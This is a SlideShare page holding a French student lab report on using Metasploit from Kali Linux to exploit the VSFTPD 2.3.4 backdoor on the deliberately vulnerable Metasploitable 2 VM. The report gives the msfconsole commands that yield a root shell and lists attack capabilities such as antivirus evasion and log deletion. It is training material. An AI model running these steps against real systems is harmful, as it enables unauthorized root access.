SlideShare una empresa de Scribd logo
1 de 9
Descargar para leer sin conexión
1
SECURITE
Département Génie d’Informatique
Faculté des Sciences et Techniques
TANGER
Rapport
Metasploit et Metasploitable 2
Sécurité
Le 10/12/2018
Master Système Informatique et Mobile
Réalisé par : Encadré par :
 EDAIG KHALID. Mr. BOUDHIR Anouar
2
SECURITE
SOMMAIRE
1. INTRODUCTION............................................................................................................................................3
2. C’EST QUOI METASPLOIT........................................................................................................................... 3
3. QU’EST-CE QUE PEUT FAIRE AVEC METASPLOIT................................................................................3
4. C’EST QUOI MATASPLOITABLE................................................................................................................3
5. INSTALLATION DE METASPLOIT ET METASPLOITABLE2................................................................ 4
5.1. Metasploit ..................................................................................................................................................................... 4
6. METASPLOITABLE 2 ...................................................................................................................................6
7. METASPLOITABLE 2 – VSFTPD ................................................................................................................7
7.1. Exploiter VSFTPD v2.3.4 avec Metasploit....................................................................................................................... 7
8. CONCLUSION .................................................................................................................................................9
3
SECURITE
1. Introduction
Dans ce TP , nous allons exploiter VSFTPD v2.3.4 manuellement et avec Metasploit. Cet exploit VSFTPD
particulier est assez facile à exploiter et constitue un excellent premier départ sur la boîte Metasploitable 2.
2. C’est quoi Metasploit
Metsploit est un outil pour le développement et l’exécution d’exploits contre une machine distante, il permet
de réaliser des audits en sécurité, de tester et développer ses propres exploits. Créé à l’origine en langage de
programmation Perl, Metasploit Framework a été complètement réécrit en langage Ruby.
Il est utilisé souvent par les administrateurs systèmes pour tester les vulnérabilités des systèmes
informatiques afin de les protéger, ou par les hackers à des fins de piratage.
3. Qu’est-ce que peut faire avec Metasploit
Le Framework permet de faire énormément de chose comme :
 Le scan et collecte l’ensemble d’informations sur une machine
 Repérage et l’exploitation des vulnérabilités
 Escalade de privilèges et vol de données
 Installation d’une porte dérobée
 Fuzzing
 Echapper à l’antivirus
 Suppression des logs et des traces
4. C’est quoi Matasploitable
Metasploitable2 (Linux) Metasploitable est une machine virtuelle Linux intentionnellement vulnérable. Cette
machine virtuelle peut être utilisée pour dispenser une formation à la sécurité, tester des outils de sécurité et
appliquer des techniques de test de pénétration courantes.
4
SECURITE
5. Installation de Metasploit et Metasploitable2
5.1. Metasploit
Metasploit est pré-installé dans Kali linux . Il existe en version payante et en version gratuite.
Bien sûr, Kali est fourni avec la version gratuite.
Figure 1 : les machines virtuelle kali linux et Metasploitable2
Avant de commencer avec Metasploit, vous devez connaître quelques termes, comme exploit,
payload…etc
Qu’est-ce qu’un exploit avec Metasploit
C’est des scripts ruby qui nous permettent d’exploiter une vulnérabilité sur une machine distante. On
peut dire que l’exploit nous donne la possibilité de se connecter à une machine vulnérable
Qu’est ce qu’un Payload
C’est le code exécuté après s’être introduit dans la machine cible, il nous permet de contrôler la machine
d’une victime. Comme par exemple : l’ouverture d’un port sur la machine relié à un shell ou encore
l’ouverture d’une session VNC.
Qu’est ce qu’un msfconsole
Selon offensive-security, msfencode est un autre excellent petit outil dans l’arsenal du framework lorsqu’il s’agit
d’exploiter le développement. La plupart du temps, on ne peut pas simplement utiliser le shellcode généré directement
sur msfpayload. Il doit être encodé en fonction de la cible afin de fonctionner correctement. Cela peut signifier
transformer votre shellcode en pur alphanumérique, éliminer les mauvais caractères ou l’encoder pour une cible 64 bits.
Vocabulaire Réseau important
LHOST : lhost est l’adresse IP de l’attaquant
LPORT : C’est le port que vous souhaitez utiliser
RHOST : Ceci est l’adresse IP de la machine victime
RPORT : Le numéro de port de la victime.
5
SECURITE
On va commencer avec Metasploit
 Démarrez le service Kali PostgreSQL.
 Démarrez le service Kali Metasploit.
 Démarrer la msfconsole.
6
SECURITE
 Afficher le status de db
 afficher les différents types d’exploits
6. Metasploitable 2
 Connexion à la machine vm Matasloitable 2
 Récupérer l'adresse IP de la machine virtuelle Metasploitable 2
7
SECURITE
7. Metasploitable 2 – VSFTPD
7.1. Exploiter VSFTPD v2.3.4 avec Metasploit
Tout d’abord, on va installer la dernière version de Kali linux, il vous faut configurer votre base de
donnée pour Metasploit. Heureusement pour nous,cela se fait de plus en plus facilement.
 service postgresql start
 msfdb init
 Msfconsole
Afficher le status de connection à la DB
msf > db_statut
Bien connecté.
Le Framework Metasploit contient un exploit spécifique pour exploiter la vulnérabilité de l’application
VSFTPD de v2.3.4. on utilise Metasploit pour exploiter VSFTPD v2.3.4.
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf > show options : pour afficher les différentes options
8
SECURITE
Maintenant on va préciser l’IP de notre hôte-cible par la commande suivante.
msf> set RHOST [IP CIBLE]
Après on va exécuter par la commande run
msf> run
Maintenant on a une session ouvert dans la machine Matasploitable 2. On va travailler sur cette dernière.
-ls /etc pour afficher le contenu du dossier etc.
-on va créer un dossier ‘khalid’
9
SECURITE
8. Conclusion
J’ai exploité une vulnérabilité de l’application VSFTPD v2.3.4 avec Metasploit. Le service
VSFTPD v2.3.4 est en cours d’exécution en tant que root , ce qui nous a donné un ‘shell-root’ sur le
terminal. Sachez maintenant que ce tp est à titre d’exemple car il sera très peu probable que vous
rencontrez cette vulnérabilité dans une situation actuelle car cette version de VSFTPD est vieille et que
la version vulnérable était uniquement disponible qu’un seul jour pour cette démonstration.

Más contenido relacionado

La actualidad más candente

Mise en place d'une Plateforme de Supervision et de Détection d'Intrusion Sys...
Mise en place d'une Plateforme de Supervision et de Détection d'Intrusion Sys...Mise en place d'une Plateforme de Supervision et de Détection d'Intrusion Sys...
Mise en place d'une Plateforme de Supervision et de Détection d'Intrusion Sys...Alaaeddine Tlich
 
Ch_1 - Généralités sur la sécurité informatique.pdf
Ch_1 - Généralités sur la sécurité informatique.pdfCh_1 - Généralités sur la sécurité informatique.pdf
Ch_1 - Généralités sur la sécurité informatique.pdfNafissa11
 
Etude et mise en place d’un Cloud privé Avec Openstack
Etude et mise en place d’un Cloud privé Avec OpenstackEtude et mise en place d’un Cloud privé Avec Openstack
Etude et mise en place d’un Cloud privé Avec OpenstackBayeOusseynouFall
 
Installation et configuration d'un système de Détection d'intrusion (IDS)
Installation et configuration d'un système de Détection d'intrusion (IDS)Installation et configuration d'un système de Détection d'intrusion (IDS)
Installation et configuration d'un système de Détection d'intrusion (IDS)Charif Khrichfa
 
sécurité informatique
sécurité informatiquesécurité informatique
sécurité informatiqueMohammed Zaoui
 
Sécurité informatique
Sécurité informatiqueSécurité informatique
Sécurité informatiqueoussama Hafid
 
Mise en place d'un système de messagerie sécurisée pour une PME/PMI
Mise en place d'un système de messagerie sécurisée pour une PME/PMIMise en place d'un système de messagerie sécurisée pour une PME/PMI
Mise en place d'un système de messagerie sécurisée pour une PME/PMIPapa Cheikh Cisse
 
ETUDE ET MISE EN PLACE D'UNE SOLUTION DE CLOUD COMPUTING PRIVÉ BASÉE SUR UN ...
ETUDE ET MISE EN PLACE D'UNE SOLUTION DE CLOUD COMPUTING  PRIVÉ BASÉE SUR UN ...ETUDE ET MISE EN PLACE D'UNE SOLUTION DE CLOUD COMPUTING  PRIVÉ BASÉE SUR UN ...
ETUDE ET MISE EN PLACE D'UNE SOLUTION DE CLOUD COMPUTING PRIVÉ BASÉE SUR UN ...Borel NZOGANG
 
Rapport de stage nagios
Rapport de stage nagiosRapport de stage nagios
Rapport de stage nagioshindif
 
Rapport projet fin d'étude
Rapport projet fin d'étudeRapport projet fin d'étude
Rapport projet fin d'étudeHibaFarhat3
 
Administration Reseau
Administration ReseauAdministration Reseau
Administration Reseaudenischef1
 
Administration réseaux sous linux cours 1
Administration réseaux sous linux   cours 1Administration réseaux sous linux   cours 1
Administration réseaux sous linux cours 1Stephen Salama
 
Securite informatique
Securite informatiqueSecurite informatique
Securite informatiqueSouhaib El
 
IDS,SNORT ET SÉCURITÉ RESEAU
IDS,SNORT ET SÉCURITÉ RESEAUIDS,SNORT ET SÉCURITÉ RESEAU
IDS,SNORT ET SÉCURITÉ RESEAUCHAOUACHI marwen
 
Cours sécurité 2_asr
Cours sécurité 2_asrCours sécurité 2_asr
Cours sécurité 2_asrTECOS
 

La actualidad más candente (20)

Mise en place d'une Plateforme de Supervision et de Détection d'Intrusion Sys...
Mise en place d'une Plateforme de Supervision et de Détection d'Intrusion Sys...Mise en place d'une Plateforme de Supervision et de Détection d'Intrusion Sys...
Mise en place d'une Plateforme de Supervision et de Détection d'Intrusion Sys...
 
Ch_1 - Généralités sur la sécurité informatique.pdf
Ch_1 - Généralités sur la sécurité informatique.pdfCh_1 - Généralités sur la sécurité informatique.pdf
Ch_1 - Généralités sur la sécurité informatique.pdf
 
Etude et mise en place d’un Cloud privé Avec Openstack
Etude et mise en place d’un Cloud privé Avec OpenstackEtude et mise en place d’un Cloud privé Avec Openstack
Etude et mise en place d’un Cloud privé Avec Openstack
 
Installation et configuration d'un système de Détection d'intrusion (IDS)
Installation et configuration d'un système de Détection d'intrusion (IDS)Installation et configuration d'un système de Détection d'intrusion (IDS)
Installation et configuration d'un système de Détection d'intrusion (IDS)
 
sécurité informatique
sécurité informatiquesécurité informatique
sécurité informatique
 
projet fin d'étude IWAN
projet fin d'étude IWANprojet fin d'étude IWAN
projet fin d'étude IWAN
 
Sécurité informatique
Sécurité informatiqueSécurité informatique
Sécurité informatique
 
Rapport finiale
Rapport finialeRapport finiale
Rapport finiale
 
Mise en place d'un système de messagerie sécurisée pour une PME/PMI
Mise en place d'un système de messagerie sécurisée pour une PME/PMIMise en place d'un système de messagerie sécurisée pour une PME/PMI
Mise en place d'un système de messagerie sécurisée pour une PME/PMI
 
ETUDE ET MISE EN PLACE D'UNE SOLUTION DE CLOUD COMPUTING PRIVÉ BASÉE SUR UN ...
ETUDE ET MISE EN PLACE D'UNE SOLUTION DE CLOUD COMPUTING  PRIVÉ BASÉE SUR UN ...ETUDE ET MISE EN PLACE D'UNE SOLUTION DE CLOUD COMPUTING  PRIVÉ BASÉE SUR UN ...
ETUDE ET MISE EN PLACE D'UNE SOLUTION DE CLOUD COMPUTING PRIVÉ BASÉE SUR UN ...
 
Rapport de stage nagios
Rapport de stage nagiosRapport de stage nagios
Rapport de stage nagios
 
La Sécurité informatiques
La Sécurité informatiquesLa Sécurité informatiques
La Sécurité informatiques
 
Rapport projet fin d'étude
Rapport projet fin d'étudeRapport projet fin d'étude
Rapport projet fin d'étude
 
Administration Reseau
Administration ReseauAdministration Reseau
Administration Reseau
 
Administration réseaux sous linux cours 1
Administration réseaux sous linux   cours 1Administration réseaux sous linux   cours 1
Administration réseaux sous linux cours 1
 
Securite informatique
Securite informatiqueSecurite informatique
Securite informatique
 
QCM Sécurité Informatique
QCM Sécurité InformatiqueQCM Sécurité Informatique
QCM Sécurité Informatique
 
IDS,SNORT ET SÉCURITÉ RESEAU
IDS,SNORT ET SÉCURITÉ RESEAUIDS,SNORT ET SÉCURITÉ RESEAU
IDS,SNORT ET SÉCURITÉ RESEAU
 
présentation sur le vpn
présentation sur le vpn présentation sur le vpn
présentation sur le vpn
 
Cours sécurité 2_asr
Cours sécurité 2_asrCours sécurité 2_asr
Cours sécurité 2_asr
 

Similar a Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4

Rapport de base de données gaci cui
Rapport de base de données gaci cuiRapport de base de données gaci cui
Rapport de base de données gaci cuiIdir Gaci
 
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...Trésor-Dux LEBANDA
 
Creation de cluster (Master et deux slave ) nfs, htcondor, mpi
Creation de cluster (Master et deux slave ) nfs, htcondor, mpiCreation de cluster (Master et deux slave ) nfs, htcondor, mpi
Creation de cluster (Master et deux slave ) nfs, htcondor, mpiKhalid EDAIG
 
Spectre et Meltdown : quels impacts pour vous et vos clients ?
Spectre et Meltdown : quels impacts pour vous et vos clients ?Spectre et Meltdown : quels impacts pour vous et vos clients ?
Spectre et Meltdown : quels impacts pour vous et vos clients ?Kiwi Backup
 
White paper: SSTIC 2008: Advanced CSRF
White paper: SSTIC 2008: Advanced CSRFWhite paper: SSTIC 2008: Advanced CSRF
White paper: SSTIC 2008: Advanced CSRFManfred Touron
 
Projet de-recherche-Tuteuré
Projet de-recherche-TuteuréProjet de-recherche-Tuteuré
Projet de-recherche-TuteuréRullier Anthony
 
Build automatique et distribution OTA avec Xcode 4.x et Jenkins
Build automatique et distribution OTA avec Xcode 4.x et JenkinsBuild automatique et distribution OTA avec Xcode 4.x et Jenkins
Build automatique et distribution OTA avec Xcode 4.x et JenkinsCocoaHeads France
 
Backdoors et rootkits_avancees
Backdoors et rootkits_avanceesBackdoors et rootkits_avancees
Backdoors et rootkits_avanceesUltraUploader
 
Installation Et Configuration De Monkey Spider
Installation Et Configuration De Monkey SpiderInstallation Et Configuration De Monkey Spider
Installation Et Configuration De Monkey SpiderMohamed Ben Bouzid
 
Rapport atelier Web App Security 2015
Rapport atelier Web App Security 2015Rapport atelier Web App Security 2015
Rapport atelier Web App Security 2015Hamza Ben Marzouk
 
Ops@viadeo : Puppet & Co... 6 mois après par Xavier Krantz
Ops@viadeo : Puppet & Co... 6 mois après par Xavier KrantzOps@viadeo : Puppet & Co... 6 mois après par Xavier Krantz
Ops@viadeo : Puppet & Co... 6 mois après par Xavier KrantzOlivier DASINI
 
Reverse Engineering d'un ransomware
Reverse Engineering d'un ransomwareReverse Engineering d'un ransomware
Reverse Engineering d'un ransomwareNinaSAMMUT
 
Supervision rc3a9seau
Supervision rc3a9seauSupervision rc3a9seau
Supervision rc3a9seauMed Ali Bhs
 
Tuto atelier securisation_site_web
Tuto atelier securisation_site_webTuto atelier securisation_site_web
Tuto atelier securisation_site_websahar dridi
 
Virt lightning-montreal-linux-meetup-2020-02
Virt lightning-montreal-linux-meetup-2020-02Virt lightning-montreal-linux-meetup-2020-02
Virt lightning-montreal-linux-meetup-2020-02Gonéri Le Bouder
 
Securisation des web services soap contre les attaques par injection
Securisation des web services soap contre les attaques par injectionSecurisation des web services soap contre les attaques par injection
Securisation des web services soap contre les attaques par injectionZakaria SMAHI
 
Sec day cuckoo_workshop
Sec day cuckoo_workshopSec day cuckoo_workshop
Sec day cuckoo_workshopThomas Roccia
 
Prévention et traitement du hack de serveurs
Prévention et traitement du hack de serveursPrévention et traitement du hack de serveurs
Prévention et traitement du hack de serveursAmen.fr
 

Similar a Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4 (20)

Rapport de base de données gaci cui
Rapport de base de données gaci cuiRapport de base de données gaci cui
Rapport de base de données gaci cui
 
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...
 
Creation de cluster (Master et deux slave ) nfs, htcondor, mpi
Creation de cluster (Master et deux slave ) nfs, htcondor, mpiCreation de cluster (Master et deux slave ) nfs, htcondor, mpi
Creation de cluster (Master et deux slave ) nfs, htcondor, mpi
 
Spectre et Meltdown : quels impacts pour vous et vos clients ?
Spectre et Meltdown : quels impacts pour vous et vos clients ?Spectre et Meltdown : quels impacts pour vous et vos clients ?
Spectre et Meltdown : quels impacts pour vous et vos clients ?
 
White paper: SSTIC 2008: Advanced CSRF
White paper: SSTIC 2008: Advanced CSRFWhite paper: SSTIC 2008: Advanced CSRF
White paper: SSTIC 2008: Advanced CSRF
 
Atelier IDS SNORT
Atelier IDS SNORTAtelier IDS SNORT
Atelier IDS SNORT
 
Projet de-recherche-Tuteuré
Projet de-recherche-TuteuréProjet de-recherche-Tuteuré
Projet de-recherche-Tuteuré
 
Build automatique et distribution OTA avec Xcode 4.x et Jenkins
Build automatique et distribution OTA avec Xcode 4.x et JenkinsBuild automatique et distribution OTA avec Xcode 4.x et Jenkins
Build automatique et distribution OTA avec Xcode 4.x et Jenkins
 
Backdoors et rootkits_avancees
Backdoors et rootkits_avanceesBackdoors et rootkits_avancees
Backdoors et rootkits_avancees
 
Installation Et Configuration De Monkey Spider
Installation Et Configuration De Monkey SpiderInstallation Et Configuration De Monkey Spider
Installation Et Configuration De Monkey Spider
 
Rapport atelier Web App Security 2015
Rapport atelier Web App Security 2015Rapport atelier Web App Security 2015
Rapport atelier Web App Security 2015
 
rapportWAS
rapportWASrapportWAS
rapportWAS
 
Ops@viadeo : Puppet & Co... 6 mois après par Xavier Krantz
Ops@viadeo : Puppet & Co... 6 mois après par Xavier KrantzOps@viadeo : Puppet & Co... 6 mois après par Xavier Krantz
Ops@viadeo : Puppet & Co... 6 mois après par Xavier Krantz
 
Reverse Engineering d'un ransomware
Reverse Engineering d'un ransomwareReverse Engineering d'un ransomware
Reverse Engineering d'un ransomware
 
Supervision rc3a9seau
Supervision rc3a9seauSupervision rc3a9seau
Supervision rc3a9seau
 
Tuto atelier securisation_site_web
Tuto atelier securisation_site_webTuto atelier securisation_site_web
Tuto atelier securisation_site_web
 
Virt lightning-montreal-linux-meetup-2020-02
Virt lightning-montreal-linux-meetup-2020-02Virt lightning-montreal-linux-meetup-2020-02
Virt lightning-montreal-linux-meetup-2020-02
 
Securisation des web services soap contre les attaques par injection
Securisation des web services soap contre les attaques par injectionSecurisation des web services soap contre les attaques par injection
Securisation des web services soap contre les attaques par injection
 
Sec day cuckoo_workshop
Sec day cuckoo_workshopSec day cuckoo_workshop
Sec day cuckoo_workshop
 
Prévention et traitement du hack de serveurs
Prévention et traitement du hack de serveursPrévention et traitement du hack de serveurs
Prévention et traitement du hack de serveurs
 

Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4

  • 1. 1 SECURITE Département Génie d’Informatique Faculté des Sciences et Techniques TANGER Rapport Metasploit et Metasploitable 2 Sécurité Le 10/12/2018 Master Système Informatique et Mobile Réalisé par : Encadré par :  EDAIG KHALID. Mr. BOUDHIR Anouar
  • 2. 2 SECURITE SOMMAIRE 1. INTRODUCTION............................................................................................................................................3 2. C’EST QUOI METASPLOIT........................................................................................................................... 3 3. QU’EST-CE QUE PEUT FAIRE AVEC METASPLOIT................................................................................3 4. C’EST QUOI MATASPLOITABLE................................................................................................................3 5. INSTALLATION DE METASPLOIT ET METASPLOITABLE2................................................................ 4 5.1. Metasploit ..................................................................................................................................................................... 4 6. METASPLOITABLE 2 ...................................................................................................................................6 7. METASPLOITABLE 2 – VSFTPD ................................................................................................................7 7.1. Exploiter VSFTPD v2.3.4 avec Metasploit....................................................................................................................... 7 8. CONCLUSION .................................................................................................................................................9
  • 3. 3 SECURITE 1. Introduction Dans ce TP , nous allons exploiter VSFTPD v2.3.4 manuellement et avec Metasploit. Cet exploit VSFTPD particulier est assez facile à exploiter et constitue un excellent premier départ sur la boîte Metasploitable 2. 2. C’est quoi Metasploit Metsploit est un outil pour le développement et l’exécution d’exploits contre une machine distante, il permet de réaliser des audits en sécurité, de tester et développer ses propres exploits. Créé à l’origine en langage de programmation Perl, Metasploit Framework a été complètement réécrit en langage Ruby. Il est utilisé souvent par les administrateurs systèmes pour tester les vulnérabilités des systèmes informatiques afin de les protéger, ou par les hackers à des fins de piratage. 3. Qu’est-ce que peut faire avec Metasploit Le Framework permet de faire énormément de chose comme :  Le scan et collecte l’ensemble d’informations sur une machine  Repérage et l’exploitation des vulnérabilités  Escalade de privilèges et vol de données  Installation d’une porte dérobée  Fuzzing  Echapper à l’antivirus  Suppression des logs et des traces 4. C’est quoi Matasploitable Metasploitable2 (Linux) Metasploitable est une machine virtuelle Linux intentionnellement vulnérable. Cette machine virtuelle peut être utilisée pour dispenser une formation à la sécurité, tester des outils de sécurité et appliquer des techniques de test de pénétration courantes.
  • 4. 4 SECURITE 5. Installation de Metasploit et Metasploitable2 5.1. Metasploit Metasploit est pré-installé dans Kali linux . Il existe en version payante et en version gratuite. Bien sûr, Kali est fourni avec la version gratuite. Figure 1 : les machines virtuelle kali linux et Metasploitable2 Avant de commencer avec Metasploit, vous devez connaître quelques termes, comme exploit, payload…etc Qu’est-ce qu’un exploit avec Metasploit C’est des scripts ruby qui nous permettent d’exploiter une vulnérabilité sur une machine distante. On peut dire que l’exploit nous donne la possibilité de se connecter à une machine vulnérable Qu’est ce qu’un Payload C’est le code exécuté après s’être introduit dans la machine cible, il nous permet de contrôler la machine d’une victime. Comme par exemple : l’ouverture d’un port sur la machine relié à un shell ou encore l’ouverture d’une session VNC. Qu’est ce qu’un msfconsole Selon offensive-security, msfencode est un autre excellent petit outil dans l’arsenal du framework lorsqu’il s’agit d’exploiter le développement. La plupart du temps, on ne peut pas simplement utiliser le shellcode généré directement sur msfpayload. Il doit être encodé en fonction de la cible afin de fonctionner correctement. Cela peut signifier transformer votre shellcode en pur alphanumérique, éliminer les mauvais caractères ou l’encoder pour une cible 64 bits. Vocabulaire Réseau important LHOST : lhost est l’adresse IP de l’attaquant LPORT : C’est le port que vous souhaitez utiliser RHOST : Ceci est l’adresse IP de la machine victime RPORT : Le numéro de port de la victime.
  • 5. 5 SECURITE On va commencer avec Metasploit  Démarrez le service Kali PostgreSQL.  Démarrez le service Kali Metasploit.  Démarrer la msfconsole.
  • 6. 6 SECURITE  Afficher le status de db  afficher les différents types d’exploits 6. Metasploitable 2  Connexion à la machine vm Matasloitable 2  Récupérer l'adresse IP de la machine virtuelle Metasploitable 2
  • 7. 7 SECURITE 7. Metasploitable 2 – VSFTPD 7.1. Exploiter VSFTPD v2.3.4 avec Metasploit Tout d’abord, on va installer la dernière version de Kali linux, il vous faut configurer votre base de donnée pour Metasploit. Heureusement pour nous,cela se fait de plus en plus facilement.  service postgresql start  msfdb init  Msfconsole Afficher le status de connection à la DB msf > db_statut Bien connecté. Le Framework Metasploit contient un exploit spécifique pour exploiter la vulnérabilité de l’application VSFTPD de v2.3.4. on utilise Metasploit pour exploiter VSFTPD v2.3.4. msf > use exploit/unix/ftp/vsftpd_234_backdoor msf > show options : pour afficher les différentes options
  • 8. 8 SECURITE Maintenant on va préciser l’IP de notre hôte-cible par la commande suivante. msf> set RHOST [IP CIBLE] Après on va exécuter par la commande run msf> run Maintenant on a une session ouvert dans la machine Matasploitable 2. On va travailler sur cette dernière. -ls /etc pour afficher le contenu du dossier etc. -on va créer un dossier ‘khalid’
  • 9. 9 SECURITE 8. Conclusion J’ai exploité une vulnérabilité de l’application VSFTPD v2.3.4 avec Metasploit. Le service VSFTPD v2.3.4 est en cours d’exécution en tant que root , ce qui nous a donné un ‘shell-root’ sur le terminal. Sachez maintenant que ce tp est à titre d’exemple car il sera très peu probable que vous rencontrez cette vulnérabilité dans une situation actuelle car cette version de VSFTPD est vieille et que la version vulnérable était uniquement disponible qu’un seul jour pour cette démonstration.